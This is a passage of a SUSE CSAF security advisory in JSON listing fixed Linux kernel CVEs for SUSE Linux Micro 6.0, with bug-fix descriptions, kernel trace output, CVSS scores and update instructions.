"url": "https://bugzilla.suse.com/1255632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53997"
},
{
"cve": "CVE-2023-53998",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53998"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwrng: virtio - Fix race on data_avail and actual data\n\nThe virtio rng device kicks off a new entropy request whenever the\ndata available reaches zero. When a new request occurs at the end\nof a read operation, that is, when the result of that request is\nonly needed by the next reader, then there is a race between the\nwriting of the new data and the next reader.\n\nThis is because there is no synchronisation whatsoever between the\nwriter and the reader.\n\nFix this by writing data_avail with smp_store_release and reading\nit with smp_load_acquire when we first enter read. The subsequent\nreads are safe because they\u0027re either protected by the first load\nacquire, or by the completion mechanism.\n\nAlso remove the redundant zeroing of data_idx in random_recv_done\n(data_idx must already be zero at this point) and data_avail in\nrequest_entropy (ditto).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53998",
"url": "https://www.suse.com/security/cve/CVE-2023-53998"
},
{
"category": "external",
"summary": "SUSE Bug 1255578 for CVE-2023-53998",
"url": "https://bugzilla.suse.com/1255578"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53998"
},
{
"cve": "CVE-2023-53999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: TC, Fix internal port memory leak\n\nThe flow rule can be splited, and the extra post_act rules are added\nto post_act table. It\u0027s possible to trigger memleak when the rule\nforwards packets from internal port and over tunnel, in the case that,\nfor example, CT \u0027new\u0027 state offload is allowed. As int_port object is\nassigned to the flow attribute of post_act rule, and its refcnt is\nincremented by mlx5e_tc_int_port_get(), but mlx5e_tc_int_port_put() is\nnot called, the refcnt is never decremented, then int_port is never\nfreed.\n\nThe kmemleak reports the following error:\nunreferenced object 0xffff888128204b80 (size 64):\n comm \"handler20\", pid 50121, jiffies 4296973009 (age 642.932s)\n hex dump (first 32 bytes):\n 01 00 00 00 19 00 00 00 03 f0 00 00 04 00 00 00 ................\n 98 77 67 41 81 88 ff ff 98 77 67 41 81 88 ff ff .wgA.....wgA....\n backtrace:\n [\u003c00000000e992680d\u003e] kmalloc_trace+0x27/0x120\n [\u003c000000009e945a98\u003e] mlx5e_tc_int_port_get+0x3f3/0xe20 [mlx5_core]\n [\u003c0000000035a537f0\u003e] mlx5e_tc_add_fdb_flow+0x473/0xcf0 [mlx5_core]\n [\u003c0000000070c2cec6\u003e] __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core]\n [\u003c000000005cc84048\u003e] mlx5e_configure_flower+0xd40/0x4c40 [mlx5_core]\n [\u003c000000004f8a2031\u003e] mlx5e_rep_indr_offload.isra.0+0x10e/0x1c0 [mlx5_core]\n [\u003c000000007df797dc\u003e] mlx5e_rep_indr_setup_tc_cb+0x90/0x130 [mlx5_core]\n [\u003c0000000016c15cc3\u003e] tc_setup_cb_add+0x1cf/0x410\n [\u003c00000000a63305b4\u003e] fl_hw_replace_filter+0x38f/0x670 [cls_flower]\n [\u003c000000008bc9e77c\u003e] fl_change+0x1fd5/0x4430 [cls_flower]\n [\u003c00000000e7f766e4\u003e] tc_new_tfilter+0x867/0x2010\n [\u003c00000000e101c0ef\u003e] rtnetlink_rcv_msg+0x6fc/0x9f0\n [\u003c00000000e1111d44\u003e] netlink_rcv_skb+0x12c/0x360\n [\u003c0000000082dd6c8b\u003e] netlink_unicast+0x438/0x710\n [\u003c00000000fc568f70\u003e] netlink_sendmsg+0x794/0xc50\n [\u003c0000000016e92590\u003e] sock_sendmsg+0xc5/0x190\n\nSo fix this by moving int_port cleanup code to the flow attribute\nfree helper, which is used by all the attribute free cases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53999",
"url": "https://www.suse.com/security/cve/CVE-2023-53999"
},
{
"category": "external",
"summary": "SUSE Bug 1255621 for CVE-2023-53999",
"url": "https://bugzilla.suse.com/1255621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53999"
},
{
"cve": "CVE-2023-54000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: fix deadlock issue when externel_lb and reset are executed together\n\nWhen externel_lb and reset are executed together, a deadlock may\noccur:\n[ 3147.217009] INFO: task kworker/u321:0:7 blocked for more than 120 seconds.\n[ 3147.230483] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 3147.238999] task:kworker/u321:0 state:D stack: 0 pid: 7 ppid: 2 flags:0x00000008\n[ 3147.248045] Workqueue: hclge hclge_service_task [hclge]\n[ 3147.253957] Call trace:\n[ 3147.257093] __switch_to+0x7c/0xbc\n[ 3147.261183] __schedule+0x338/0x6f0\n[ 3147.265357] schedule+0x50/0xe0\n[ 3147.269185] schedule_preempt_disabled+0x18/0x24\n[ 3147.274488] __mutex_lock.constprop.0+0x1d4/0x5dc\n[ 3147.279880] __mutex_lock_slowpath+0x1c/0x30\n[ 3147.284839] mutex_lock+0x50/0x60\n[ 3147.288841] rtnl_lock+0x20/0x2c\n[ 3147.292759] hclge_reset_prepare+0x68/0x90 [hclge]\n[ 3147.298239] hclge_reset_subtask+0x88/0xe0 [hclge]\n[ 3147.303718] hclge_reset_service_task+0x84/0x120 [hclge]\n[ 3147.309718] hclge_service_task+0x2c/0x70 [hclge]\n[ 3147.315109] process_one_work+0x1d0/0x490\n[ 3147.319805] worker_thread+0x158/0x3d0\n[ 3147.324240] kthread+0x108/0x13c\n[ 3147.328154] ret_from_fork+0x10/0x18\n\nIn externel_lb process, the hns3 driver call napi_disable()\nfirst, then the reset happen, then the restore process of the\nexternel_lb will fail, and will not call napi_enable(). When\ndoing externel_lb again, napi_disable() will be double call,\ncause a deadlock of rtnl_lock().\n\nThis patch use the HNS3_NIC_STATE_DOWN state to protect the\ncalling of napi_disable() and napi_enable() in externel_lb\nprocess, just as the usage in ndo_stop() and ndo_start().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54000",
"url": "https://www.suse.com/security/cve/CVE-2023-54000"
},
{
"category": "external",
"summary": "SUSE Bug 1255564 for CVE-2023-54000",
"url": "https://bugzilla.suse.com/1255564"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54000"
},
{
"cve": "CVE-2023-54001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: r8712: Fix memory leak in _r8712_init_xmit_priv()\n\nIn the above mentioned routine, memory is allocated in several places.\nIf the first succeeds and a later one fails, the routine will leak memory.\nThis patch fixes commit 2865d42c78a9 (\"staging: r8712u: Add the new driver\nto the mainline kernel\"). A potential memory leak in\nr8712_xmit_resource_alloc() is also addressed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54001",
"url": "https://www.suse.com/security/cve/CVE-2023-54001"
},
{
"category": "external",
"summary": "SUSE Bug 1255628 for CVE-2023-54001",
"url": "https://bugzilla.suse.com/1255628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54001"
},
{
"cve": "CVE-2023-54005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: fix memory leak in binder_init()\n\nIn binder_init(), the destruction of binder_alloc_shrinker_init() is not\nperformed in the wrong path, which will cause memory leaks. So this commit\nintroduces binder_alloc_shrinker_exit() and calls it in the wrong path to\nfix that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54005",
"url": "https://www.suse.com/security/cve/CVE-2023-54005"
},
{
"category": "external",
"summary": "SUSE Bug 1255629 for CVE-2023-54005",
"url": "https://bugzilla.suse.com/1255629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54005"
},
{
"cve": "CVE-2023-54006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix data-race around unix_tot_inflight.\n\nunix_tot_inflight is changed under spin_lock(unix_gc_lock), but\nunix_release_sock() reads it locklessly.\n\nLet\u0027s use READ_ONCE() for unix_tot_inflight.\n\nNote that the writer side was marked by commit 9d6d7f1cb67c (\"af_unix:\nannote lockless accesses to unix_tot_inflight \u0026 gc_in_progress\")\n\nBUG: KCSAN: data-race in unix_inflight / unix_release_sock\n\nwrite (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1:\n unix_inflight+0x130/0x180 net/unix/scm.c:64\n unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123\n unix_scm_to_skb net/unix/af_unix.c:1832 [inline]\n unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x148/0x160 net/socket.c:747\n ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493\n ___sys_sendmsg+0xc6/0x140 net/socket.c:2547\n __sys_sendmsg+0x94/0x140 net/socket.c:2576\n __do_sys_sendmsg net/socket.c:2585 [inline]\n __se_sys_sendmsg net/socket.c:2583 [inline]\n __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nread to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0:\n unix_release_sock+0x608/0x910 net/unix/af_unix.c:671\n unix_release+0x59/0x80 net/unix/af_unix.c:1058\n __sock_release+0x7d/0x170 net/socket.c:653\n sock_close+0x19/0x30 net/socket.c:1385\n __fput+0x179/0x5e0 fs/file_table.c:321\n ____fput+0x15/0x20 fs/file_table.c:349\n task_work_run+0x116/0x1a0 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:171 [inline]\n exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204\n __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline]\n syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297\n do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nvalue changed: 0x00000000 -\u003e 0x00000001\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
